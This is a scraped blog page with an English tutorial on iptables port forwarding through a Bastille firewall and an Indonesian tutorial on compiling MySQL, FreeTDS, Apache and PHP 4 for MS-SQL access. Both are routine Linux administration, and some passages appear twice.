Source: xxx.xxx.xxx.xxx:8888 -- forwarded to -> 192.168.0.2:80
Port Forwarding using Iptables
Since I have been using 2.4 kernel, I use iptables for firewall and NAT. So these are the Iptable rules required for port forwarding xxx.xxx.xxx.xxx:8888 to 192.168.0.2:80 .
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2 --dport 80 -j ACCEPT
How to add custom rules to Bastille firewall
Since I trust Bastille firwall script to generate the correct iptable scripts for my server, I wanted to keep those scripts but add these custom port forwarding rules to supplement/extend it.
But the version of Bastille on my machine ( 1.2.0 ) does not support port forwarding, and does not had a way of adding custom scripts to it. Posting the question to Bastille mailing list generated these prompt responses from Peter Watkins, core developer of Bastille. ( See the complete thread )
Following Peter's advice I upgraded Bastille to the latest version, without any problem. The new version regenerated all the scripts with my old rules intact.
And with the new Bastill in place and working fine doing all the firewall filteringa nd NAT. I made the following changes to add a supplemental script, portforward.sh ( get the script ) for my custom port forwarding rules.
Created the directories for supplemetal script. ( as explained in the comments at portforward.sh )
/etc/Bastille/firewall.d/pre-chain-split.d/
Created portforward.sh with working portforwarding rules, following the sample script from Peter.
[ Please note: The ipchains rules in portforward.sh are untested. I have left it there from Peter's sample script for completeness. ]
In portforward.sh all you have to do is specify the portforwarding source and destination IP addresses and ports with the ethernet interface name ( "eth0" if you have only one interface ) and the protocol type ( "tcp" in this case ).
IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80"
Also you can have multiple port forwaring specified like:
IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80
eth0-xxx.xxx.xxx.xxx-2222-tcp-192.168.0.2-22"
This will be parsed and stored into varibles down the script and used in the following Iptable calls to generate the rules. [ NOTE: The rules need to be on a single continuous line, I have broken it down to two lines for readability ]
${IPTABLES} -t nat -A PREROUTING -p $fw_inproto -i $fw_iface
-d $fw_inaddr --dport $fw_inport -j DNAT --to $fw_outaddr:$fw_outport
${IPTABLES} -A FORWARD -p $fw_inproto -i $fw_iface
-d $fw_outaddr --dport $fw_outport -j ACCEPT
Which will translate to.
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2
--dport 80 -j ACCEPT
Now we can restart Bastille scripts to make this rules effective.
#/etc/rc.d/init.d/bastille-firewall start
Verify the rules by listing them.
# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere xxx.xxx.xxx.xxxtcp dpt:ddi-tcp-1 to:192.168.0.2:80
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
#
[ where "ddi-tcp-1", I assume corresponds to port 8888 ]
Verify the port forwaring works by connecting to the port from a machine outside the network.
Notes on this setup
The above rules work fine when you access from outside, but if you try to access the same port xxx.xxx.xxx.xxx:8888 from an internal machine, it will not work. But from the internal network you dont need the forwarding, since you can directly access the machine 192.168.0.2:80.
http://www.netfilter.org/
http://www.bastille-linux.org/
I have my home network setup as described here. So my linux gateway server is the only one visible to the internet, while all other machines are in an internal subnet with DHCP assigned IP's not visible to the outside internet, but can access the outside net using Iptables based Network Address Translation (NAT).
Why you need portforwarding
So in this setup if I want to run a public service like httpd, not on the gateway server ( where it is visible to outside ) but on an internal machine ( which is not visible outside ) how do I make it availble to the outside internet.
To make the above scenario of exposing and internal machine's service to outside we need to use port forwarding on the gateway server. Which is assigning a port on the gateway to accept all connections and forward it to the internal machines port where the service is listening to.
Let xxx.xxx.xxx.xxx be the IP address of the gateway server connected to the cable modem and 192.168.0.2 , the IP address of the internal machine. And say we want to run a web server ( httpd ) on 192,168.0.2 on port 80 which should be avaialble to the outside internet. We can forward the port 80 on xxx.xxx.xxx.xxx to port 80 of 192.168.0.2
Source: xxx.xxx.xxx.xxx:80 -- forwarded to -> 192.168.0.2:80
You can chhose any port on xxx.xxx.xxx.xxx it need not match the port we are forwarding to.
Source: xxx.xxx.xxx.xxx:8888 -- forwarded to -> 192.168.0.2:80
Port Forwarding using Iptables
Since I have been using 2.4 kernel, I use iptables for firewall and NAT. So these are the Iptable rules required for port forwarding xxx.xxx.xxx.xxx:8888 to 192.168.0.2:80 .
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2 --dport 80 -j ACCEPT
How to add custom rules to Bastille firewall
Since I trust Bastille firwall script to generate the correct iptable scripts for my server, I wanted to keep those scripts but add these custom port forwarding rules to supplement/extend it.
But the version of Bastille on my machine ( 1.2.0 ) does not support port forwarding, and does not had a way of adding custom scripts to it. Posting the question to Bastille mailing list generated these prompt responses from Peter Watkins, core developer of Bastille. ( See the complete thread )
Following Peter's advice I upgraded Bastille to the latest version, without any problem. The new version regenerated all the scripts with my old rules intact.
And with the new Bastill in place and working fine doing all the firewall filteringa nd NAT. I made the following changes to add a supplemental script, portforward.sh ( get the script ) for my custom port forwarding rules.
Created the directories for supplemetal script. ( as explained in the comments at portforward.sh )
/etc/Bastille/firewall.d/pre-chain-split.d/
Created portforward.sh with working portforwarding rules, following the sample script from Peter.
[ Please note: The ipchains rules in portforward.sh are untested. I have left it there from Peter's sample script for completeness. ]
In portforward.sh all you have to do is specify the portforwarding source and destination IP addresses and ports with the ethernet interface name ( "eth0" if you have only one interface ) and the protocol type ( "tcp" in this case ).
IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80"
Also you can have multiple port forwaring specified like:
IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80
eth0-xxx.xxx.xxx.xxx-2222-tcp-192.168.0.2-22"
This will be parsed and stored into varibles down the script and used in the following Iptable calls to generate the rules. [ NOTE: The rules need to be on a single continuous line, I have broken it down to two lines for readability ]
${IPTABLES} -t nat -A PREROUTING -p $fw_inproto -i $fw_iface
-d $fw_inaddr --dport $fw_inport -j DNAT --to $fw_outaddr:$fw_outport
${IPTABLES} -A FORWARD -p $fw_inproto -i $fw_iface
-d $fw_outaddr --dport $fw_outport -j ACCEPT
Which will translate to.
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2
--dport 80 -j ACCEPT
Now we can restart Bastille scripts to make this rules effective.
#/etc/rc.d/init.d/bastille-firewall start
Verify the rules by listing them.
# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere xxx.xxx.xxx.xxxtcp dpt:ddi-tcp-1 to:192.168.0.2:80
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
#
[ where "ddi-tcp-1", I assume corresponds to port 8888 ]
Verify the port forwaring works by connecting to the port from a machine outside the network.
Notes on this setup
The above rules work fine when you access from outside, but if you try to access the same port xxx.xxx.xxx.xxx:8888 from an internal machine, it will not work. But from the internal network you dont need the forwarding, since you can directly access the machine 192.168.0.2:80.
http://www.netfilter.org/
http://www.bastille-linux.org/
Monday, March 07, 2005
Instalasi web server apache support php, ms-sql dan mysql
tulisan ini timbul karena banyak teman-teman saya para programer ingin menitipkan aplikasi berbasis web di server web server berbasis linx yang dikelola oleh saya. kebetulan pada saat itu sudah ada web server apache support php dan mysql. kendala timbul ketika saya tanyakan kepada teman-teman programer apa database yang diakses, kebanyakan dari mereka menggunakan ms-sql. Dari kebutuhan tersebut saya mencari referensi-refernsi yang dibutuhkan yang ternyata belum ada referensi yang berbahasa indonesia (mungkin saya yang tidak tau, hehehehe). untuk itu saya membuat tutorial ini untuk teman-teman yang memiliki kebutuhan yang sama.saya sangat mengharapkan sekali kritik, saran dan masukan pada tulisan ini sehingga nantinya terbentuk tutorial yang representatif.
Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. banyak sekali kekurangan pada tutorial ini. Terima Kasih.
saya tidak terbiasa berpanjang lebar dengan kata-kata, mari kita langsung saja memulai tahapan instalasi
1. Requirement
mysql-4.0.17.tar.gz
freetds-stable.tgz
httpd-2.0.47.tar.gz
php-4.2.3.tar.gz
download file-file tersebut di situs software yang bersangkutan. apabila tidak tahu silahkan surfing di universita google, dijamin ketemu :-).
untuk semua file-file yang telah di extrack saya terbiasa meletakkannya di directory /usr/local/src. silahkan sesuaikan dengan kebutuhan anda. file-file source saya letakkan di directory /home/bdul.
2. Instalasi Mysql (optional, kalo anda ingin install mysql di web server anda)
tidak ada alasan apapun saya menggunakan mysql versi 4.0.17, karena memang saya hanya memanfaatkan source yang sudah ada di pc saya, dan kebetulan hanya itu yang ada.
buat user dan group untuk mysql, kalau sudah ada perintah dibawah ini tidak perlu dilakukan.
root@gateway:/usr/local/srcl# groupadd mysql
root@gateway:/usr/local/srcl# useradd -g mysql mysql
lanjutkan dengan extrak dan intallasi mysql dengan perintah :
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/mysql-4.0.17.tar.gz
root@gateway:/usr/local/srcl# cd mysql-4.0.17
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/mysql
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/mysql. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls /usr/local/mysql
bin include info lib libexec man mysql-test share sql-bench var
sampai tahapan ini berarti anda sudah sukses menginstall mysql. tapi jangan senang dulu karena masih ada tahapan lain untuk mengkonfigurasi mysql agar dapat berjalan dengan baik.
masuk ke directory /usr/local/mysql dengan perintah :
root@gateway:/usr/local/srcl#cd /usr/local/mysql
jalankan script untuk menginstall databases pendukung dengan perintah :
root@gateway:/usr/local/mysql# scripts/mysql_install_db
ganti kepemilikan directory mysql beserta directory anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql
ganti kepemilikan directory mysql/data beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R mysql /usr/local/mysql/var
ganti kepemilikan group dari directory mysql beserta anak-anaknya sebagai milik mysql
root@gateway:/usr/local/mysql# chgrp -R mysql /usr/local/mysql
ganti kepemilikan directory mysql/bin beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql/bin
apabila sudah semua selesai dilakukan struktur directory mysql dapat dilihat seperti ini:
root@gateway:/usr/local/src# ls /usr/local/mysql -l
total 7
drwxr-xr-x 2 root root 1480 Jun 10 14:35 bin
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 include
drwxr-xr-x 2 root mysql 104 Jun 10 14:35 info
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 lib
drwxr-xr-x 2 root mysql 72 Jun 10 14:35 libexec
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 man
drwxr-xr-x 6 root mysql 232 Jun 10 14:35 mysql-test
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 share
drwxr-xr-x 5 root mysql 888 Jun 10 14:35 sql-bench
drwx------ 4 mysql mysql 288 Jun 16 09:21 var
mari kita jalankan mysql sebagai daemon
root@gateway:/usr/local/mysql# bin/mysqld_safe --user=mysql &
cek apakah mysql sudah aktif pada pc kita dengan perintah :
root@gateway:/usr/local/mysql# ps aux | grep mysql
root 3231 0.0 0.8 2048 1016 tty1 S 09:21 0:00 /bin/sh bin/mysqld_safe
mysql 3248 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3250 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3251 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3252 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3253 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3254 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3255 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3256 0.0 9.9 46092 12428 tty1 S 09:21 0:16 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3257 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3258 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
root 3462 0.0 0.3 1472 492 pts/0 S 15:46 0:00 grep mysql
tahapan konfigurasi telah selesai dan database server mysql sudah siap untuk diakses :-)
untuk lebih amannya mari kita setting password root untuk mysql kita ubah dulu dengan perintah:
root@gateway:/usr/local/mysql# bin/mysqladmin -u root password 'terserah'
sekarang mari kita masuk ke database servernya :
root@gateway:/usr/local/mysql# bin/mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6 to server version: 4.0.17
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
selesai deh intalasi mysql nya. ternyata panjang juga ya :-)
3. Instalasi Freetds
saya memakai versi terbaru dari freetds pada saat ini (12 juni 2004) yaitu versi 0.62.3 dan saya langsung download dari situ http://www.freetds.org. Freetds ini dibutuhkan untuk antar muka koneksi ke database ms-sql, sebetulnya freetds bisa juga sebagai antar muka koneksi ke sybase tapi kita tidak sedang membahas itu :-) kalo mau, cari aja referensi ditempat lain ya.......
mari kita kembali ke directory /usr/local/src dan memulai tahapan instalasi freetds..
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/freetds-stable.tgz
root@gateway:/usr/local/srcl# cd freetds-0.62.3
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/freetds --with-tdsver=8.0 --enable-msdblib
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
root@gateway:/usr/local/srcl# make clean
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/freetds. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/freetds
total 4
drwxr-xr-x 2 root root 144 Jun 9 10:00 bin
drwxr-xr-x 2 root root 144 Jun 9 10:00 etc
drwxr-xr-x 2 root root 488 Jun 9 10:00 include
drwxr-xr-x 2 root root 656 Jun 9 10:00 lib
drwxr-xr-x 3 root root 72 Jun 9 10:00 man
drwxr-xr-x 3 root root 72 Jun 9 10:00 share
mari kita coba untuk mencoba freetds untuk mengakses database ms-sql. sebelum mencoba kita pindah dulu ke directory freetds
root@gateway:/usr/local/srcl# cd /usr/local/freetds
untuk mencoba koneksi kita menggunakan 'tsql' . untuk lebih jelas tentang -S -U silahkan belajar sendiri aja ya........
root@gateway:/usr/local/freetds# bin/tsql -S 192.168.1.1 -U express
locale is "C"
locale charset is "ANSI_X3.4-1968"
Password:
1>
apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi freetdsnya berjalan dengan baik.
4. Instalasi apache
apache ini digunakan untuk web server, ada banyak web server yang dapat digunakan salah satunya adalah apache. mari kita mulai tahapan instalasi apache dan kembali ke direktory /usr/local/src.
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/httpd-2.0.47.tar.gz
root@gateway:/usr/local/srcl# cd httpd-2.0.47
root@gateway:/usr/local/srcl# ./configure --enable-so
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/apache2. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/apache2
total 23
drwxr-xr-x 2 root root 464 Jun 10 16:04 bin
drwxr-xr-x 2 root root 312 Jun 10 16:04 build
drwxr-xr-x 2 root root 96 Jun 10 16:04 cgi-bin
drwxr-xr-x 2 root root 336 Jun 10 16:08 conf
drwxr-xr-x 3 root root 1024 Jun 10 16:04 error
drwxr-xr-x 3 root root 1400 Jun 10 17:20 htdocs
drwxr-xr-x 3 root root 4600 Jun 10 16:04 icons
drwxr-xr-x 2 root root 3568 Jun 10 16:04 include
drwxr-xr-x 2 root root 448 Jun 10 16:04 lib
drwxr-xr-x 2 root root 112 Jun 11 13:34 logs
drwxr-xr-x 4 root root 96 Jun 10 16:04 man
drwxr-xr-x 14 root root 8320 Jun 10 16:04 manual
drwxr-xr-x 2 root root 112 Jun 10 16:08 modules
mari kita coba untuk mengaktifkan web server dengan perintah:
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl start
untuk melihat servis apache berjalan dengan baik lakukan perintah berikut:
root@gateway:/usr/local/apache2# ps aux | grep apache
root 3524 1.0 2.1 5920 2684 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3525 1.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3526 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3527 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3528 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3529 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi apache berjalan dengan baik.
5. Instalasi php
Tahapan terakhir adalah install php nya sendiri. mari kita kembali ke directory /usr/local/src dan memulai dengan extrak dan installasi
root@gateway:/usr/local/src# tar zxvf /home/bdul/php-4.2.3.tar.gz
root@gateway:/usr/local/src# cd php-4.2.3
root@gateway:/usr/local/src# ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql \
--with-sybase=/usr/local/freetds --with-mssql=/usr/local/freetds
root@gateway:/usr/local/src# make
root@gateway:/usr/local/src# make install
kopikan php.ini ke directory /usr/local/lib/php.ini
root@gateway:/usr/local/src# cp php.ini-dist /usr/local/lib/php.ini
edit file httpd.conf pada directory /usr/local/apache2/conf/ dan tambahkan baris berikut
LoadModule php4_module libexec/libphp4.so
AddType application/x-httpd-php .php .phtml
AddType application/x-httpd-php-source .phps
restart apache anda dengan perintah berikut
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl restart
buat file test.php dan letakkan di directory /usr/local/apache2/htdocs. isi file adalah sebagai berikut :
phpinfo();
?>
coba akses file tersebut melalui browser anda, apabila ada keterangan konfigurasi php maka keseluruhan installasi berjalan dengan sukses :-)
jangan lupa untuk mengucapkan 'Alhamdulillah hirobbil alamin'
6. Referensi
www.apache.org
www.php.net
www.mysql.org
www.freetds.org
Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. banyak sekali kekurangan pada tutorial ini. Terima Kasih.
saya tidak terbiasa berpanjang lebar dengan kata-kata, mari kita langsung saja memulai tahapan instalasi
1. Requirement
mysql-4.0.17.tar.gz
freetds-stable.tgz
httpd-2.0.47.tar.gz
php-4.2.3.tar.gz
download file-file tersebut di situs software yang bersangkutan. apabila tidak tahu silahkan surfing di universita google, dijamin ketemu :-).
untuk semua file-file yang telah di extrack saya terbiasa meletakkannya di directory /usr/local/src. silahkan sesuaikan dengan kebutuhan anda. file-file source saya letakkan di directory /home/bdul.
2. Instalasi Mysql (optional, kalo anda ingin install mysql di web server anda)
tidak ada alasan apapun saya menggunakan mysql versi 4.0.17, karena memang saya hanya memanfaatkan source yang sudah ada di pc saya, dan kebetulan hanya itu yang ada.
buat user dan group untuk mysql, kalau sudah ada perintah dibawah ini tidak perlu dilakukan.
root@gateway:/usr/local/srcl# groupadd mysql
root@gateway:/usr/local/srcl# useradd -g mysql mysql
lanjutkan dengan extrak dan intallasi mysql dengan perintah :
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/mysql-4.0.17.tar.gz
root@gateway:/usr/local/srcl# cd mysql-4.0.17
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/mysql
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/mysql. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls /usr/local/mysql
bin include info lib libexec man mysql-test share sql-bench var
sampai tahapan ini berarti anda sudah sukses menginstall mysql. tapi jangan senang dulu karena masih ada tahapan lain untuk mengkonfigurasi mysql agar dapat berjalan dengan baik.
masuk ke directory /usr/local/mysql dengan perintah :
root@gateway:/usr/local/srcl#cd /usr/local/mysql
jalankan script untuk menginstall databases pendukung dengan perintah :
root@gateway:/usr/local/mysql# scripts/mysql_install_db
ganti kepemilikan directory mysql beserta directory anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql
ganti kepemilikan directory mysql/data beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R mysql /usr/local/mysql/var
ganti kepemilikan group dari directory mysql beserta anak-anaknya sebagai milik mysql
root@gateway:/usr/local/mysql# chgrp -R mysql /usr/local/mysql
ganti kepemilikan directory mysql/bin beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql/bin
apabila sudah semua selesai dilakukan struktur directory mysql dapat dilihat seperti ini:
root@gateway:/usr/local/src# ls /usr/local/mysql -l
total 7
drwxr-xr-x 2 root root 1480 Jun 10 14:35 bin
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 include
drwxr-xr-x 2 root mysql 104 Jun 10 14:35 info
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 lib
drwxr-xr-x 2 root mysql 72 Jun 10 14:35 libexec
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 man
drwxr-xr-x 6 root mysql 232 Jun 10 14:35 mysql-test
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 share
drwxr-xr-x 5 root mysql 888 Jun 10 14:35 sql-bench
drwx------ 4 mysql mysql 288 Jun 16 09:21 var
mari kita jalankan mysql sebagai daemon
root@gateway:/usr/local/mysql# bin/mysqld_safe --user=mysql &
cek apakah mysql sudah aktif pada pc kita dengan perintah :
root@gateway:/usr/local/mysql# ps aux | grep mysql
root 3231 0.0 0.8 2048 1016 tty1 S 09:21 0:00 /bin/sh bin/mysqld_safe
mysql 3248 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3250 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3251 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3252 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3253 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3254 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3255 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3256 0.0 9.9 46092 12428 tty1 S 09:21 0:16 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3257 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3258 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
root 3462 0.0 0.3 1472 492 pts/0 S 15:46 0:00 grep mysql
tahapan konfigurasi telah selesai dan database server mysql sudah siap untuk diakses :-)
untuk lebih amannya mari kita setting password root untuk mysql kita ubah dulu dengan perintah:
root@gateway:/usr/local/mysql# bin/mysqladmin -u root password 'terserah'
sekarang mari kita masuk ke database servernya :
root@gateway:/usr/local/mysql# bin/mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6 to server version: 4.0.17
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
selesai deh intalasi mysql nya. ternyata panjang juga ya :-)
3. Instalasi Freetds
saya memakai versi terbaru dari freetds pada saat ini (12 juni 2004) yaitu versi 0.62.3 dan saya langsung download dari situ http://www.freetds.org. Freetds ini dibutuhkan untuk antar muka koneksi ke database ms-sql, sebetulnya freetds bisa juga sebagai antar muka koneksi ke sybase tapi kita tidak sedang membahas itu :-) kalo mau, cari aja referensi ditempat lain ya.......
mari kita kembali ke directory /usr/local/src dan memulai tahapan instalasi freetds..
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/freetds-stable.tgz
root@gateway:/usr/local/srcl# cd freetds-0.62.3
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/freetds --with-tdsver=8.0 --enable-msdblib
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
root@gateway:/usr/local/srcl# make clean
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/freetds. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/freetds
total 4
drwxr-xr-x 2 root root 144 Jun 9 10:00 bin
drwxr-xr-x 2 root root 144 Jun 9 10:00 etc
drwxr-xr-x 2 root root 488 Jun 9 10:00 include
drwxr-xr-x 2 root root 656 Jun 9 10:00 lib
drwxr-xr-x 3 root root 72 Jun 9 10:00 man
drwxr-xr-x 3 root root 72 Jun 9 10:00 share
mari kita coba untuk mencoba freetds untuk mengakses database ms-sql. sebelum mencoba kita pindah dulu ke directory freetds
root@gateway:/usr/local/srcl# cd /usr/local/freetds
untuk mencoba koneksi kita menggunakan 'tsql' . untuk lebih jelas tentang -S -U silahkan belajar sendiri aja ya........
root@gateway:/usr/local/freetds# bin/tsql -S 192.168.1.1 -U express
locale is "C"
locale charset is "ANSI_X3.4-1968"
Password:
1>
apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi freetdsnya berjalan dengan baik.
4. Instalasi apache
apache ini digunakan untuk web server, ada banyak web server yang dapat digunakan salah satunya adalah apache. mari kita mulai tahapan instalasi apache dan kembali ke direktory /usr/local/src.
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/httpd-2.0.47.tar.gz
root@gateway:/usr/local/srcl# cd httpd-2.0.47
root@gateway:/usr/local/srcl# ./configure --enable-so
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/apache2. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/apache2
total 23
drwxr-xr-x 2 root root 464 Jun 10 16:04 bin
